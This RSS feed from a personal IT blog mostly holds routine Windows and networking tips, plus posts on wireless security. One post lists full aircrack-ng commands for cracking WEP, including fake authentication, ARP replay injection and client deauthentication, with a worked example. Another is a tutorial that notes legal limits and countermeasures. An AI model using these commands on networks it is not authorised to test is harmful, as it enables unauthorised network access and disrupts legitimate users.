<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Mind Circus &#187; Networking</title>
	<atom:link href="http://www.twistedethics.com/category/networking/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.twistedethics.com</link>
	<description>Inside the mind of a young IT Professional</description>
	<lastBuildDate>Wed, 18 Jan 2012 11:37:41 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Notes: Cracking WEP on the Windows command line with Aircrack-ng and AirPcap Tx</title>
		<link>http://www.twistedethics.com/2007/09/12/notes-cracking-wep-with-aircrack-ng-and-airpcap-tx/</link>
		<comments>http://www.twistedethics.com/2007/09/12/notes-cracking-wep-with-aircrack-ng-and-airpcap-tx/#comments</comments>
		<pubDate>Wed, 12 Sep 2007 18:37:34 +0000</pubDate>
		<dc:creator>Phil Wiffen</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Wi-Fi]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[aircrack-ng]]></category>
		<category><![CDATA[airpcap]]></category>
		<category><![CDATA[airpcap tx]]></category>
		<category><![CDATA[cracking]]></category>
		<category><![CDATA[wep]]></category>

		<guid isPermaLink="false">http://www.twistedethics.com/2007/09/12/notes-cracking-wep-with-aircrack-ng-and-airpcap-tx/</guid>
		<description><![CDATA[
Finally, I&#8217;ve had time to write down my notes on using aircrack-ng with the Airpcap Tx adapter in Windows. Before you read on, please be aware that this isn&#8217;t meant to be a guide or tutorial, it&#8217;s just my notes. Thanky  
Basics
Start capturing:

airodump-ng \\.\airpcap00 airpcap CHANNELNUMBER mycapturefile

Fake auth:

aireplay-ng --fakeauth 0 -e "MYSSID" -a BSSIDMAC [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.twistedethics.com/wp-content/uploads/2007/09/airpcap-arp-injection.png" alt="ARP injection in Windows using AirPcap Tx" /></p>
<p>Finally, I&#8217;ve had time to write down my notes on using aircrack-ng with the <a href="http://www.crownhill.co.uk/product.php?prod=1779&amp;ref=wireless-analysis">Airpcap Tx adapter</a> in Windows. Before you read on, please be aware that this isn&#8217;t meant to be a guide or tutorial, it&#8217;s <strong>just my notes</strong>. Thanky <img src='http://www.twistedethics.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<h3>Basics</h3>
<p>Start capturing:</p>
<p><code></p>
<pre>airodump-ng \\.\airpcap00 airpcap CHANNELNUMBER mycapturefile</pre>
<p></code></p>
<p>Fake auth:</p>
<p><code></p>
<pre>aireplay-ng --fakeauth 0 -e "MYSSID" -a BSSIDMAC -h AIRPCAPMAC \\.\airpcap00</pre>
<p></code></p>
<p>Start attack:</p>
<p><code></p>
<pre>aireplay-ng --arpreplay -b BSSIDMAC -h CLIENTMAC \\.\airpcap00</pre>
<p></code></p>
<p>Deauth (if we need ARPs):</p>
<p><span style="font-family: 'Courier New'; line-height: 18px; white-space: pre;">aireplay-ng &#8211;deauth 3 -a BSSIDMAC -c CLIENTMAC \\.\airpcap00</span></p>
<p>Start cracking:</p>
<p><code></p>
<pre>aircrack-ng -z mycapturefile.cap</pre>
<p></code></p>
<p>Worked example:</p>
<pre><code>airodump-ng.exe \\.\airpcap00 airpcap 11 mycapturefile
aireplay-ng --fakeauth 0 -e "WEP" -a 00:a0:c5:9d:d5:50 -h 00:02:72:67:92:8a \\.\airpcap00
aireplay-ng --arpreplay -b 00:a0:c5:9d:d5:50 -h 00:90:4b:eb:9b:36 \\.\airpcap00
aireplay-ng --deauth 3 -a 00:a0:c5:9d:d5:50 -c 00:90:4b:eb:9b:36 \\.\airpcap00
aircrack-ng -z mycapturefile.cap</code></pre>
<h3>Download</h3>
<p>I&#8217;ve prepared a special release of the aircrack-ng tools originally prepared by CACE Technologies on the AirPcap CDROM. It replaces the new aireplay-ng.exe with an older one which, in my tests,  appears to perform better.<br />
<a title="aircrack-ng release 0.9" href="http://www.twistedethics.com/wp-content/uploads/2007/09/aircrack-ng-09-twistedethicscom-edition.zip"><br />
<strong>Download the release of aircrack-ng for AirPcap Tx</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.twistedethics.com/2007/09/12/notes-cracking-wep-with-aircrack-ng-and-airpcap-tx/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Putty now supports Serial COM connections</title>
		<link>http://www.twistedethics.com/2007/06/28/putty-now-supports-serial-com-connections/</link>
		<comments>http://www.twistedethics.com/2007/06/28/putty-now-supports-serial-com-connections/#comments</comments>
		<pubDate>Thu, 28 Jun 2007 11:17:55 +0000</pubDate>
		<dc:creator>Phil Wiffen</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[Troubleshooting]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.twistedethics.com/2007/06/28/putty-now-supports-serial-com-connections/</guid>
		<description><![CDATA[This is pretty cool: Whilst searching for an alternative to HyperTerminal that supports Serial Port connections, I discovered that PuTTY now connects to Serial COM ports as well as the usual SSH/Telnet stuff  
As a business you can&#8217;t use HyperTerminal Private Edition unless you pay a licence fee; and now that Microsoft has removed [...]]]></description>
			<content:encoded><![CDATA[<p>This is pretty cool: Whilst searching for an alternative to HyperTerminal that supports Serial Port connections, I discovered that PuTTY now connects to Serial COM ports as well as the usual SSH/Telnet stuff <img src='http://www.twistedethics.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>As a business you can&#8217;t use <a href="http://www.hilgraeve.com/htpe/index.html">HyperTerminal Private Edition</a> unless you pay a licence fee; and now that Microsoft has removed HyperTerminal from Windows Vista, finding an Open Source, free-for-commercial-use, replacement for HyperTerminal is invaluable for budget constrained IT departments.</p>
<p><a href="http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html">Download PuTTY here</a></p>
<p>It also seems that <a href="http://www.poderosa.org/">Poderosa</a> support Serial comms with a <a href="http://en.poderosa.org/download/plugins.html">plugin</a>, which I wasn&#8217;t aware of until reading this <a href="http://blogs.lanlogic.net/blogs/tom/archive/2006/12/21/HyperTerminal-for-Vista.aspx">blog post</a>.</p>
<p>What do you use instead of HyperTerminal? I&#8217;d love to hear about any programs I&#8217;ve missed! <img src='http://www.twistedethics.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.twistedethics.com/2007/06/28/putty-now-supports-serial-com-connections/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cracking WEP with aircrack-ptw in Windows with AirPcap and Cain</title>
		<link>http://www.twistedethics.com/2007/06/11/cracking-wep-with-aircrack-ptw-in-windows-with-airpcap-and-cain/</link>
		<comments>http://www.twistedethics.com/2007/06/11/cracking-wep-with-aircrack-ptw-in-windows-with-airpcap-and-cain/#comments</comments>
		<pubDate>Mon, 11 Jun 2007 13:22:31 +0000</pubDate>
		<dc:creator>Phil Wiffen</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Wi-Fi]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.twistedethics.com/2007/06/11/cracking-wep-with-aircrack-ptw-in-windows-with-airpcap-and-cain/</guid>
		<description><![CDATA[
Every time you deploy a WEP Access Point, a fluffy kitty dies.
Primer
Recently a team of German cryptography researchers perfected methods to recover a WEP key faster than ever before. The older Weak IV attacks generally needed between 500,000 and 2,000,000 packets to recover a 128-bit WEP key. In contrast, the new PTW method needs a [...]]]></description>
			<content:encoded><![CDATA[<div class="highlight">
<p><strong>Every time you deploy a WEP Access Point, a fluffy kitty dies.</strong></div>
<h3>Primer</h3>
<p>Recently a team of German cryptography researchers <a href="http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/">perfected methods to recover a WEP key</a> faster than ever before. The older Weak IV attacks generally needed between 500,000 and 2,000,000 packets to recover a 128-bit WEP key. In contrast, the new PTW method needs a mere 85,000 packets to have a 95% chance of recovering the WEP key.</p>
<p>Unlike the Weak IV attack, instead of collecting weak IVs, the PTW method collects ARP requests and responses to attack the encryption. ARP requests can either be collected naturally, or can be generated via packet injection. Until recently, packet injection was only possible in Linux. With the advent of the <a href="http://www.crownhill.co.uk/product.php?prod=1779&amp;ref=wireless-analysis">AirPcap USB adapter</a>, and some unsupported beta drivers, it&#8217;s possible to inject packets in Windows. <em>Update:</em> CACE have released AirPcap Tx, which features fully supported packet injection, for an added premium.</p>
<p>In this tutorial, I&#8217;ll guide you through the process of recovering a WEP key, via the PTW attack, in Windows. For this you&#8217;ll be using the AirPcap USB adapter, Cain, aircrack-ptw, and the aircrack-ng suite.</p>
<p><object id="Player_cccd45be-edcd-4422-a559-d4a7ab1be4d0" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="500px" height="175px" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="quality" value="high" /><param name="bgcolor" value="#FFFFFF" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://ws.amazon.co.uk/widgets/q?ServiceVersion=20070822&amp;MarketPlace=GB&amp;ID=V20070822%2FGB%2Fmincir0e-21%2F8010%2Fcccd45be-edcd-4422-a559-d4a7ab1be4d0&amp;Operation=GetDisplayTemplate" /><param name="name" value="Player_cccd45be-edcd-4422-a559-d4a7ab1be4d0" /><param name="align" value="middle" /><embed id="Player_cccd45be-edcd-4422-a559-d4a7ab1be4d0" type="application/x-shockwave-flash" width="500px" height="175px" src="http://ws.amazon.co.uk/widgets/q?ServiceVersion=20070822&amp;MarketPlace=GB&amp;ID=V20070822%2FGB%2Fmincir0e-21%2F8010%2Fcccd45be-edcd-4422-a559-d4a7ab1be4d0&amp;Operation=GetDisplayTemplate" align="middle" name="Player_cccd45be-edcd-4422-a559-d4a7ab1be4d0" allowscriptaccess="always" bgcolor="#FFFFFF" quality="high"></embed></object></p>
<p><noscript><a href="http://ws.amazon.co.uk/widgets/q?ServiceVersion=20070822&amp;MarketPlace=GB&amp;ID=V20070822%2FGB%2Fmincir0e-21%2F8010%2Fcccd45be-edcd-4422-a559-d4a7ab1be4d0&amp;Operation=NoScript">Amazon.co.uk Widgets</a></noscript></p>
<h3>Legalities</h3>
<p>It&#8217;s important to point out that these methods should only be applied with permission from the owner of the target AP. You should either be auditing, penetration testing, or demonstrating the weaknesses of WEP in a Test Lab environment. You should not be using these methods to get &#8220;Free internet&#8221;!</p>
<h3>Preparation</h3>
<p>You&#8217;ll need:</p>
<ul>
<li>An AP configured with WEP</li>
<li>At least one client associated with the Access Point (to give us an initial ARP request)</li>
<li>A standard <a href="http://www.crownhill.co.uk/product.php?prod=1779&amp;ref=wireless-analysis">AirPcap Adapter</a> with the unsupported <a href="http://rapidshare.com/files/29501895/setup_airpcap_2_0_beta_tx.exe.html">beta packet injection driver</a> <strong>or</strong> a fully-supported <a href="http://www.crownhill.co.uk/product.php?prod=1779&amp;ref=wireless-analysis">AirPcap Tx</a>.</li>
<li><a href="http://www.oxid.it/cain.html">Cain and Abel</a></li>
<li><a href="http://www.twistedethics.com/wp-content/uploads/2007/05/aircrack-ng-0_7_0_beta1-airpcap.zip">aircrack-ng for AirPcap</a></li>
<li><a href="http://files.tuto-fr.com/aircrack-ptw_win32.rar">aircrack-ptw for Windows</a></li>
</ul>
<p>Now you&#8217;ll need to prepare the environment:</p>
<ul>
<li>Install the beta drivers (or if you have AirPcap Tx, install the drivers from the CD-ROM)</li>
<li>Plug in the AirPcap</li>
<li>Install Cain</li>
<li>Extract aircrack-ng to c:\airpcap\</li>
<li>Extract aircrack-ptw to c:\airpcap\</li>
<li>Move aircrack-ptw.exe to the bin folder (this is no longer required &#8211; <a href="#ptw-notes">see my notes</a>)</li>
<li>Optional: To make things easier, move the contents of the bin folder to c:\airpcap\. You&#8217;ll then be able to run aircrack-ptw.exe with just c:\airpcap\aircrack-ptw.exe mycapture.cap</li>
</ul>
<h3>Let&#8217;s get cracking</h3>
<p>I added narration to the video this evening at 20:36. It&#8217;s my first attempt at narration, and a little noisy, but I&#8217;m sure things will improve as time goes on! <img src='http://www.twistedethics.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><strong></strong></p>
<p><a href="http://www.youtube.com/watch?v=6PjDyJqA6hY">Youtube Video Link</a></p>
<h3>Countermeasures</h3>
<p>The primary counter measure to this WEP attack is to cease using WEP and switch your Access Points to WPA encryption. As you&#8217;ve seen in this video, WEP is just too easy to crack. For further reading, Wikipedia has an excellent entry on <a href="http://en.wikipedia.org/wiki/WPA2">WPA</a>.</p>
<p>Access Points are so cheap now that, if your AP doesn&#8217;t support WPA via a firmware upgrade, you can easily afford a new one with full WPA or WPA2 support.</p>
<h3 id="ptw-notes">Notes</h3>
<p>Note 1: After recording this tutorial, I&#8217;ve become aware that, as of version 0.9,  aircrack-ng.exe natively supports the PTW attack by using the -z switch. For example: <kbd>aircrack-ng.exe -z mycapturefile.cap</kbd>. If you want to use this attack, download <a href="http://www.aircrack-ng.org/doku.php#download">aircrack-ng from the authors</a>, and replace aircrack-ng.exe in c:\airpcap with the new one.</p>
<p>Note 2: The whole process from starting capture to recovering the WEP key takes about 10 minutes.</p>
<p>Note 3: It is important that you get the Packet Injection drivers and the aircrack-ng release specifically for the AirPcap adapter, or this will not work.</p>
<p>Note 4: Just to summarise the steps in the video:</p>
<ol>
<li>Run Cain and passively scan for the target AP, making a note of the Channel number.</li>
<li>Using the channel number, tell AirPcap to inject packets once it has collected an ARP request. (You can sometimes force an ARP by sending Deauth. To do that, right click on the client. Otherwise, repair the Wireless connection on the client connected to the AP)</li>
<li>To use the PTW attack, you need to collect all packets. By running airodump-ng you can collect all the packets generated by Cain. The reason we use airodump-ng instead of Cain, is that Cain only collects WEP IVs.</li>
<li>Once you&#8217;ve collected enough packets, run aircrack-ptw against the capture file.</li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://www.twistedethics.com/2007/06/11/cracking-wep-with-aircrack-ptw-in-windows-with-airpcap-and-cain/feed/</wfw:commentRss>
		<slash:comments>49</slash:comments>
	<enclosure url="http://www.twistedethics.com/assets/aircrack-ptw-sound.flv" length="1" type="video/x-flv"/>
	</item>
		<item>
		<title>Aircrack-PTW for Windows</title>
		<link>http://www.twistedethics.com/2007/06/11/aircrack-ptw-for-windows/</link>
		<comments>http://www.twistedethics.com/2007/06/11/aircrack-ptw-for-windows/#comments</comments>
		<pubDate>Mon, 11 Jun 2007 11:09:55 +0000</pubDate>
		<dc:creator>Phil Wiffen</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Wi-Fi]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.twistedethics.com/2007/06/11/aircrack-ptw-for-windows/</guid>
		<description><![CDATA[
Update
As of version 0.9, the aircrack-ng suite natively supports the PTW attack. Download it here. To invoke the PTW attack in aircrack-ng, run it with the -z switch: aircrack-ng.exe -z mycapturefile.cap.
A French chap has compiled Aircrack-PTW for Windows. This is great for anyone using the AirPcap adapter to inject packets in Windows, as the new [...]]]></description>
			<content:encoded><![CDATA[<div class="highlight">
<strong>Update</strong></p>
<p>As of version 0.9, the aircrack-ng suite natively supports the PTW attack. <a href="http://www.aircrack-ng.org/doku.php#download">Download it here</a>. To invoke the PTW attack in aircrack-ng, run it with the -z switch: <kbd>aircrack-ng.exe -z mycapturefile.cap</kbd>.</div>
<p>A French chap has compiled Aircrack-PTW for Windows. This is great for anyone using the AirPcap adapter to inject packets in Windows, as the new PTW attack dramatically reduces the amount of packets you need to collect before attempting to crack the WEP key. Notice in the screenshot below, only 83,000 packets were needed to break a 128bit key; as opposed to around 400,000 with the KoreK attack.</p>
<p><a href="http://www.twistedethics.com/wp-content/uploads/2007/06/2007-06-11_113648.png" title="aircrack-ptw on Windows"><img src="http://www.twistedethics.com/wp-content/uploads/2007/06/2007-06-11_113648.thumbnail.png" alt="aircrack-ptw on Windows" /></a></p>
<p>The executable is in French but it&#8217;s still perfectly usable; All you&#8217;re looking for is the WEP key!</p>
<p>Just run it with:</p>
<p><kbd>aircrack-ptw.exe yourcapturefile.cap</kbd></p>
<p>When I get some time I&#8217;ll try to compile a version in English, but for now you can grab the French version: <a href="http://files.tuto-fr.com/aircrack-ptw_win32.rar">Download Aircrack-PTW for Windows. </a></p>
<p>I&#8217;m in the process of writing up and recording a demonstration of cracking WEP in Windows with AirPcap, Cain, and aircrack-ptw. <strike>Expect to see something within a week!</strike> Update: <a href="http://www.twistedethics.com/2007/06/11/cracking-wep-with-aircrack-ptw-in-windows-with-airpcap-and-cain/">Check it out here</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.twistedethics.com/2007/06/11/aircrack-ptw-for-windows/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Windows XP: Missing Authentication tab</title>
		<link>http://www.twistedethics.com/2007/05/17/windows-xp-missing-authentication-tab/</link>
		<comments>http://www.twistedethics.com/2007/05/17/windows-xp-missing-authentication-tab/#comments</comments>
		<pubDate>Thu, 17 May 2007 13:32:59 +0000</pubDate>
		<dc:creator>Phil Wiffen</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[Troubleshooting]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.twistedethics.com/2007/05/17/windows-xp-missing-authentication-tab/</guid>
		<description><![CDATA[If you&#8217;re setting up 802.1x on your Network connection but can&#8217;t see the Authentication tab, make sure the &#8220;Wireless Zero Configuration&#8221; service is running.

Start &#62; Run&#8230; &#62; services.msc
Find the Wireless Zero Configuration service.
Right click on it, and choose &#8220;Start&#8221;.

The Authentication tab will then appear on your Network connection properties.
Yes, I know. But apparently, to get [...]]]></description>
			<content:encoded><![CDATA[<p>If you&#8217;re setting up 802.1x on your Network connection but can&#8217;t see the Authentication tab, make sure the &#8220;Wireless Zero Configuration&#8221; service is running.</p>
<ol>
<li>Start &gt; Run&#8230; &gt; <kbd>services.msc</kbd></li>
<li>Find the Wireless Zero Configuration service.</li>
<li>Right click on it, and choose &#8220;Start&#8221;.</li>
</ol>
<p>The Authentication tab will then appear on your Network connection properties.</p>
<p>Yes, I know. But apparently, to get 802.1x support, you need to enable a Wireless service, even though you may well be using it on a wired connection. Intuitive, eh?</p>
]]></content:encoded>
			<wfw:commentRss>http://www.twistedethics.com/2007/05/17/windows-xp-missing-authentication-tab/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Decrypting WPA with AirPcap in Windows</title>
		<link>http://www.twistedethics.com/2007/04/14/decrypting-wpa-with-airpcap-in-windows/</link>
		<comments>http://www.twistedethics.com/2007/04/14/decrypting-wpa-with-airpcap-in-windows/#comments</comments>
		<pubDate>Sat, 14 Apr 2007 09:58:58 +0000</pubDate>
		<dc:creator>Phil Wiffen</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Troubleshooting]]></category>
		<category><![CDATA[Wi-Fi]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.twistedethics.com/2007/04/14/decrypting-wpa-with-airpcap-in-windows/</guid>
		<description><![CDATA[When AirPcap was first released, only WEP decryption was supported. However, with the release of Wireshark 0.99.5 it is possible to decrypt WPA packets with the AirPcap adapter in Windows. Here's how...]]></description>
			<content:encoded><![CDATA[<p>A step-by-step guide to decrypting WPA with Wireshark and AirPcap in Windows.<span id="more-57"></span></p>
<p>When AirPcap was first released, only WEP decryption was supported. However, with the release of Wireshark 0.99.5 it is possible to decrypt WPA packets with the <a href="http://www.crownhill.co.uk/product.php?prod=1779&amp;ref=wireless-analysis">AirPcap adapter</a> in Windows. Here&#8217;s how:</p>
<ol>
<li>Install <a href="http://www.wireshark.org/download.html">Wireshark 0.99.5</a> or above</li>
<li>Run Wireshark</li>
<li>Go: View &gt; Wireless Toolbar</li>
<li>Click on &#8220;Decryption Keys&#8230;&#8221;</li>
<li>Add a new decryption key. In my instance, because I know the Passphrase, I used WPA-PWD. If you&#8217;re doing penetration testing and, you have a 64byte string from something like AirCrack, you should use WPA-PSK.<br />
<a title="2007-04-13_155300.gif" href="http://www.twistedethics.com/wp-content/uploads/2007/04/2007-04-13_155300.gif"><img src="http://www.twistedethics.com/wp-content/uploads/2007/04/2007-04-13_155300.thumbnail.gif" alt="2007-04-13_155300.gif" /></a></li>
<li>Capture away. In the screenshots below, I&#8217;ve filtered my own Wi-Fi card to cut down on the volume of &#8216;junk&#8217; and demonstrate that it is, in fact, decrypting the packets on the WLAN.<br />
<a title="2007-04-13_160402.gif" href="http://www.twistedethics.com/wp-content/uploads/2007/04/2007-04-13_160402.gif"><img src="http://www.twistedethics.com/wp-content/uploads/2007/04/2007-04-13_160402.thumbnail.gif" alt="2007-04-13_160402.gif" /></a> <a title="2007-04-13_160440.gif" href="http://www.twistedethics.com/wp-content/uploads/2007/04/2007-04-13_160440.gif"><img src="http://www.twistedethics.com/wp-content/uploads/2007/04/2007-04-13_160440.thumbnail.gif" alt="2007-04-13_160440.gif" /></a></li>
</ol>
<p>For a lot more information on getting this set up, check out the <a href="http://www.cacetech.com/support/downloads.htm">AirPcap Userguide</a>.</p>
<p>Did this help you at all? Any questions? Feel free to leave me a comment below!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.twistedethics.com/2007/04/14/decrypting-wpa-with-airpcap-in-windows/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How to: Reinstall the OS on the Dell Powervault 715N</title>
		<link>http://www.twistedethics.com/2007/04/10/how-to-reinstall-the-os-on-the-dell-powervault-715n/</link>
		<comments>http://www.twistedethics.com/2007/04/10/how-to-reinstall-the-os-on-the-dell-powervault-715n/#comments</comments>
		<pubDate>Tue, 10 Apr 2007 15:19:50 +0000</pubDate>
		<dc:creator>Phil Wiffen</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[Operating Systems]]></category>

		<guid isPermaLink="false">http://www.twistedethics.com/2007/04/10/how-to-reinstall-the-os-on-the-dell-powervault-715n/</guid>
		<description><![CDATA[We have a small family of PowerVault 715N&#8217;s here at Crownhill. They&#8217;re lovely boxes, but reinstalling the OS on them is something of a black art
Admittedly it&#8217;s a long time since I ran a reinstall, but from memory, it must be done with a Windows 2000 client: XP just plain refused to work.
Dell&#8217;s article should [...]]]></description>
			<content:encoded><![CDATA[<p>We have a small family of PowerVault 715N&#8217;s here at Crownhill. They&#8217;re lovely boxes, but reinstalling the OS on them is something of a black art</p>
<p>Admittedly it&#8217;s a long time since I ran a reinstall, but from memory, it <strong>must</strong> be done with a Windows 2000 client: XP just plain refused to work.</p>
<p><a href="http://support.euro.dell.com/support/topics/topic.aspx/emea/shared/support/dsn/en/document?c=uk&amp;l=en&amp;s=gen&amp;dn=1065245">Dell&#8217;s article</a> should cover everything you need to know.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.twistedethics.com/2007/04/10/how-to-reinstall-the-os-on-the-dell-powervault-715n/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Strange network behaviour on XP</title>
		<link>http://www.twistedethics.com/2007/02/15/strange-network-behaviour-on-xp/</link>
		<comments>http://www.twistedethics.com/2007/02/15/strange-network-behaviour-on-xp/#comments</comments>
		<pubDate>Thu, 15 Feb 2007 13:42:37 +0000</pubDate>
		<dc:creator>Phil Wiffen</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://twistedethics.com/?p=24</guid>
		<description><![CDATA[This is a curiousity rather than a true solution.  This morning, on booting his PC, a colleague found his PC refused to browse websites and (apparently) would not connect to any network shares, yet it could FTP to an external website and ping/tracert google.com. After booting XP, and entering user details (&#8220;loading your personal [...]]]></description>
			<content:encoded><![CDATA[<p>This is a curiousity rather than a true solution.  This morning, on booting his PC, a colleague found his PC refused to browse websites and (apparently) would not connect to any network shares, yet it could FTP to an external website and ping/tracert google.com. After booting XP, and entering user details (&#8220;loading your personal settings&#8230;&#8221;) the system would idle until the network cable was pulled from the NIC. The only thing which changed is that  I installed VMWare Server Console on the system the day before (not the server itself, so it shouldn&#8217;t have added virtual NICs or messed with settings).</p>
<p>I solved the problem by uninstalling the NIC driver and letting it re-install after a reboot, but I&#8217;d love to know what may have caused the issue!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.twistedethics.com/2007/02/15/strange-network-behaviour-on-xp/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>My love affair with Whiteboards</title>
		<link>http://www.twistedethics.com/2007/02/09/my-love-affair-with-whiteboards/</link>
		<comments>http://www.twistedethics.com/2007/02/09/my-love-affair-with-whiteboards/#comments</comments>
		<pubDate>Fri, 09 Feb 2007 11:53:23 +0000</pubDate>
		<dc:creator>Phil Wiffen</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[Troubleshooting]]></category>

		<guid isPermaLink="false">http://twistedethics.com/?p=23</guid>
		<description><![CDATA[Nothing beats a Whiteboard for troubleshooting nightmares uh, issues  

]]></description>
			<content:encoded><![CDATA[<p>Nothing beats a Whiteboard for troubleshooting <span style="text-decoration: line-through">nightmares</span> uh, issues <img src='http://www.twistedethics.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><a href="http://twistedethics.com/wp-content/uploads/2007/03/white-board.jpg" title="White Board - Network Topology"><img src="http://twistedethics.com/wp-content/uploads/2007/03/white-board.thumbnail.jpg" alt="White Board - Network Topology" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.twistedethics.com/2007/02/09/my-love-affair-with-whiteboards/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

